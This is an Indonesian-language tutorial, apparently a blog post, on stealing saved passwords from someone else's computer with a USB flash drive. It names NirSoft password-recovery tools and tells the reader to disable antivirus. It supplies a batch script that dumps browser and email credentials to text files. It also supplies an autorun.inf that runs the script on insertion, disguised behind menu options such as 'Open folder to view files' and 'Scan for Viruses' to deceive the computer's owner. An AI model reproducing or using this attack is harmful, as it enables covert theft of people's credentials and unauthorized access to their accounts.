MENCURI PASSWORD (Password Stealing)

Mencuri Password Menggunakan USB FlashDisk


Mungkin anda tidak menyangka bahwa media penyimpanan data yang sangat mobile seperti USB 


FlashDisk dapat menjadi sebuah media kejahatan yang sangat berbahaya. Saya serius ketika berkata berbahaya karena USB FlashDisk dapat digunakan sebagai senjata yang sangat efektif oleh para cracker untuk mencuri password anda tanpa anda ketahui dengan syarat sang cracker dapat menancapkan USB FlashDisk miliknya ke computer yang tersimpan password.Dengan alasan tidak ingin repot, kebanyakan orang (termasuk saya) menggunakan password manager yang disediakan oleh banyak aplikasi, browser internet misalnya. Untuk penggunaan yang sering, memang fitur “remember me” atau “auto complete password” memang sangat memanjakan, tapi dibalik kemanjaan itu tersimpan potensi bahaya yang tidak akan menyenangkan bila anda yang jadi korban. 
Saya akan memperlihatkan kepada anda.


Pertama kita butuh software yang berfungsi untuk me-recover password. Saya tidak akan meminta anda untuk membuat sendiri password recoverer kok karena di dunia maya sudah ada banyak sekali yang mengembangkan aplikasi seperti itu dan GERATIS misalnya http://www.nirsoft.net/. Perlu diperhatikan bahwa menurut yang punya/pengembang, beberapa antivirus akan memberikan false alarm untuk tools ini. aku g ikut-ikutan untuk permasalahan yang satu ini *tidak bertanggungjawab mode=ON*


haha


nah!
sekarang kumpulkan sofware2 ini:


IE PassView (Internet Explorer Password View)
IE PassView merupakan password revealer untuk menampilkan password yang tersimpan di Internet 


Explorer.


PasswordFox (Mozilla Firefox Password View)
PasswordFox ini memungkinkan anda membaca nama user dan password yang disimpan oleh Mozilla 
Firefox. Secara default PasswordFox akan menampilkan username dan password yang tersimpan di folder Profiles (C:\Documents and Settings\[user name]\Application Data\Mozilla\Firefox\Profiles\tabk8vv1.default), atau anda dapat mengubah direktori ini di menu File-Select Folder. Setelah anda menjalankan PasswordFox maka PasswordFox akan menampilkan informasi seperti : Record Index, Web Site, User Name, Password, User Name Field, Password Field, dan Signons filename.


Mail PassView 
Seperti namanya Mail PassView ini bermanfaat untuk menampilkan password dan informasi akun lain. 


email clients yang dapat ditampilkan oleh aplikasi berukuran mini ini diantaranya:
• Outlook Express 
• Microsoft Outlook 2000 (akun POP3 dan SMTP) 
• Microsoft Outlook 2002/2003/2007 (POP3, IMAP, HTTP dan SMTP) 
• Windows Mail 
• Windows Live Mail 
• IncrediMail 
• Eudora 
• Netscape 6.x/7.x (bila password tidak dienkrip) 
• Mozilla Thunderbird (bila password tidak dienkrip) 
• Group Mail Free 
• Yahoo! Mail (jika password disimpan di aplikasi Yahoo! Messenger)
• Hotmail/MSN mail (jika password disimpan di aplikasi MSN/Windows/Live Messenger)
• Gmail (jika password disimpan oleh Gmail Notifier, Google Desktop, atau Google Talk. 


Dialupass,ChromePass, MessenPass, OperaPassView, dan kawan-kawan. Silakan tambahin sendiri. Dengan menggunakan tools di atas dan sebuah USB FlashDisk anda dapat membuat sendiri sebuah rootkit untuk cracking. Keren kan ?


Berikut ini adalah langkah-langkah untuk menjadikan USB FlashDisk anda sebagai senjata perampok password. Demi kelancaran anda perlu mematikan antivirus anda karena kemungkinan false alarm. Kopi semua file executeable (iepv.exe, mailpv.exe, passwordfox.exe) ke USB FlashDisk anda. Kemudian buat batch file untuk menjalankan semua aplikasi pencuri password tersebut. Untuk itu buka notepad dan masukan key berikut:


[code]
start PasswordFox.exe /stext Mozilla Firefox_Password.txt
start iepv.exe /stext Internet Explorer_Password.txt
start mailpv.exe /stext Mail_Password.txt[/code]


Perintah (script) di atas akan menjalankan iepv.exe, mailpv.exe, passwordfox.exe dan mencatat semua password yang diperoleh ke file teks dengan nama yang anda tentukan, pada contoh “Mozilla Firefox_Password.txt”
Setelah anda mengetikkan script diatas, simpan notepad sebagai “launch.bat” tanpa tanda petik.
Untuk menjalankan launch.bat secara otomatis saat USB FlashDisk menancap kita membutuhkan file autorun.inf, untuk itu buka notepad dan buat autorun dengan mengetik script berikut:
[code]
[autorun]
open=launch.bat
shellexecute= launch.bat
action=Open folder to view files
shell\Explore\command= launch.bat
shell\Open\command= launch.bat
shell\Scan for Viruses...\command= launch.bat[/code]


Saya akan menjelaskan arti script di atas. Script tersebut memerintahkan sistem untuk menjalankan file launch.bat, dan sebagai cadangan dengan script shellexecute kita dapat menjalankan launch.bat dari pop-up menu autoplay. Dengan mengklik menu “Open folder to view files” sebenarnya kita telah menjalankan launch.bat, ini untuk menipu si pemilik computer, bila ia ada di sisi anda. Dan sebagai cadangan lagi (duh, saya paranoid sekali) script Shell berguna untuk menambah opsi baru pada menu bar file atau popup ketika anda melakukan klik kanan pada USB FlashDisk. Opsi tambahan itu adalah Explore, Open, Scan for Viruses, ketiga opsi ini tidak lain dan tidak bukan akan menjalankan file launch.bat milik kita 






NB: Jika anda berminat anda dapat mengubah file launch.bat menjadi file executeable (launch.exe) 


menggunakan BatToExeConverter (http://f2ko.de/) 
NB: Untuk parameter perintah yang dapat ditambahkan bisa dilihat di file readme.txt yang disertakan bersama aplikasi atau di website resminya.